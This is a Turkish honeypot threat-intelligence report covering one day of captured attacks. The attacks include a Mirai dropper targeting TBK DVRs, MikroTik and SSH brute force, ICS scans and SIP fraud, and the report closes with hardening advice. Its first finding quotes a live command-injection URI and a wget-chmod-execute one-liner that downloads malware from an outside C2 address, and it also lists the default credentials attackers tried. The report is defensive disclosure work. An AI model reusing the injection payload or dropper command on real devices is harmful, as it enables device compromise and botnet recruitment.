Canlı İstihbarat Başladı — 16 Honeypot, 2 Veri Merkezi, İlk Bulgular
İstanbul ve Sakarya veri merkezlerinde 16 farklı honeypot tipi aktif. İlk 24 saatte IoT malware dropper, MikroTik API brute-force kampanyası, SCADA taraması ve SSH credential stuffing yakalandı.
Özet — İki Şehir, Bir Ağ
Tellal honeypot ağı bugün itibarıyla çift veri merkezli yapıya geçti. İstanbul ve Sakarya DC’lerinde toplam 16 farklı honeypot tipi aktif olarak veri topluyor.
| Metrik | Değer |
|---|---|
| Aktif honeypot tipi | 16 |
| Veri merkezi | İstanbul + Sakarya |
| Son 24 saat toplam event | 420.000+ |
| Benzersiz saldırgan IP | 6.009 |
| Ülke sayısı | 15+ |
| IoC veritabanı toplam | 6.776 |
Önceki raporlarda sadece Suricata IDS ve P0f pasif fingerprint verimiz vardı. Bugünden itibaren Cowrie (SSH), Dionaea (SMB/DB), Heralding (auth), Tanner/Snare (web), Mailoney (SMTP), ConPot (ICS/SCADA), SentryPeer (SIP), Glutton (catch-all) ve özel honeypot’larımız (MikroTik API, Redis, Elasticsearch, Docker API, WinRM, K8s) aktif veri üretiyor.
Bugünün Öne Çıkan Bulguları
1. IoT Malware Dropper — Mirai Varyantı
176.65.148.127 (Rusya, AS211298 Driftnet) web honeypot’umuza bir IoT cihaz exploit payload’u gönderdi:
GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=
cd /tmp;rm arm7; wget http://87.121.112.57/kkk.arm7;
chmod 777 kkk.arm7; ./kkk.arm7 tbk.ebk; rm -rf kkk.arm7Analiz:
- Hedef: TBK DVR/NVR cihazları (güvenlik kameraları)
- Exploit:
___S_O_S_T_R_E_A_MAX___— bilinen bir TBK command injection zafiyeti - Payload:
kkk.arm7— ARM7 mimarisi için derlenmiş ELF binary (Mirai varyantı) - C2:
87.121.112.57(Bulgaristan) - Teknik: İndir → çalıştır → kendini sil (anti-forensic)
Risk: Türkiye’de yaygın kullanılan TBK/Provision marka DVR’lar bu zafiyete açık. Cihazınız internete açıksa ve firmware güncel değilse, botnet’e dahil edilebilir.
IoC:
- Saldırgan:
176.65.148.127 - C2/Dropper:
87.121.112.57 - Payload:
kkk.arm7(SHA256 doğrulama bekliyor) - URI pattern:
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
2. MikroTik API Brute-Force Kampanyası
Glutton honeypot’umuz port 8728 (MikroTik API) üzerinde yoğun bir credential stuffing kampanyası yakaladı.
| IP | Hit | Kaynak |
|---|---|---|
| 45.205.1.110 | 189 | — |
| 45.205.1.5 | 112 | — |
| 185.91.127.85 | 18 | — |
| 160.119.76.57 | 14 | — |
Toplam: 891 deneme / 24 saat. Saldırganlar /login API endpoint’ine rastgele 4 karakterlik kullanıcı adı ve tek karakterlik şifrelerle istek gönderiyor — dictionary attack değil, brute-force.
Payload örneği:
/login
=name=9J9l
=password=sRisk: MikroTik RouterOS API (8728) varsayılanda açıktır. Güçlü şifre + IP kısıtlama + API devre dışı bırakma önerilir.
3. SSH Credential Stuffing
Cowrie SSH honeypot’umuz 14 başarısız giriş denemesi yakaladı. Küçük sayı gibi görünse de honeypot yeni aktif — saldırgan sayısı saatler içinde artacak.
En çok denenen kimlik bilgileri:
admin/Admin12345— 4 denemeroot/admin123— 2 denemenobody/nobody7— 2 deneme
Saldırgan profili:
- 7 benzersiz IP, 5 farklı ülke
- 78.187.9.111 — Türkiye (Türk Telekom), aktif SSH scanner
Bunlar varsayılan/zayıf kimlik bilgileri. admin/Admin12345 kombinasyonu özellikle IoT cihaz ve yönetim panellerinde yaygın.
4. SCADA/ICS Taraması
ConPot endüstriyel kontrol sistemi honeypot’umuz port 10001 (Guardian AST — tank gauge protokolü) üzerinde tarama yakaladı.
- 91.231.89.180 ve 91.231.89.57 (Ukrayna) — aynı /24 subnet
- Hedef: Benzin istasyonu tank seviye ölçüm sistemleri
Bu taramalar genellikle Shodan/Censys benzeri araştırma amaçlıdır, ancak aynı teknik gerçek saldırılarda da kullanılır. ICS/SCADA sistemlerinizi asla doğrudan internete açmayın.
5. SIP Fraud Denemesi
SentryPeer honeypot’umuz 23.153.217.65 IP’sinden SIP INVITE istekleri yakaladı. Bu tip saldırılarda amaç:
- PBX sistemine sızma
- Premium numaralara yönlendirme (International Revenue Share Fraud)
- Kurban faturasına yüksek tutarlar yansıtma
VoIP/PBX sisteminiz varsa: SIP trunk’larınızı IP bazlı kısıtlayın, uluslararası arama limitlerini aktif edin.
6. Suricata IDS — Ağ Seviyesi Tehditler
| Signature | Sayı | Açıklama |
|---|---|---|
| NMAP -sS scan | 448 | Port tarama (27+ farklı IP) |
| MySQL inbound scan | 342 | Veritabanı keşfi |
| CVE-2024-6387 (regreSSHion) | 313 | OpenSSH RCE zafiyet tespiti |
| Dshield Block Listed | 1.328 | Bilinen kötücül kaynak |
| SSH Scan | 1.020 | SSH brute-force |
| SOCKS Proxy attempt | 24.384 | Proxy abuse |
CVE-2024-6387 (regreSSHion): OpenSSH 8.5p1-9.7p1 arası versiyonlarda race condition ile root RCE. Suricata bu zafiyete sahip SSH banner’larını tespit ediyor. OpenSSH’ınızı güncelleyin.
Saldırı Coğrafyası
| Ülke | Event | Oran |
|---|---|---|
| Fransa | 59.366 | %14 |
| ABD | 25.785 | %6 |
| Brezilya | 13.550 | %3 |
| Almanya | 12.490 | %3 |
| Hollanda | 12.119 | %3 |
| Singapur | 9.333 | %2 |
| Türkiye | 1.481 | ~%0.4 |
Fransa’nın yüksek oranı büyük oranda OVH/Scaleway cloud altyapısından gelen otomatik taramalardan kaynaklanıyor.
Honeypot Mimarisi
┌─────────────────┐ ┌─────────────────┐
│ İstanbul DC │ │ Sakarya DC │
│ Sensor Node │────▶│ Sensor Node │
│ Multi-honeypot │ WG │ Multi-honeypot │
└────────┬────────┘ └────────┬────────┘
│ │
▼ ▼
┌──────────────────────────────┐
│ Merkezi Analiz Platformu │
│ Elasticsearch + Logstash │
└──────────────────────────────┘Her iki DC’den gelen veriler merkezi analiz platformunda birleşiyor. Tüm IoC verileri CC0 lisansı ile Feed Hub’da yayınlanıyor.
Ne Yapmalı?
- DVR/NVR firmware güncelleyin — TBK cihazları hedef altında
- MikroTik API (8728) kapatın veya IP kısıtlayın
- SSH’da
admin/root+ basit şifre kullanmayın — key-based auth geçin - OpenSSH güncelleyin — CVE-2024-6387 aktif olarak taranıyor
- SIP trunk’larınızı IP bazlı kısıtlayın
- ICS/SCADA sistemlerini internetten izole edin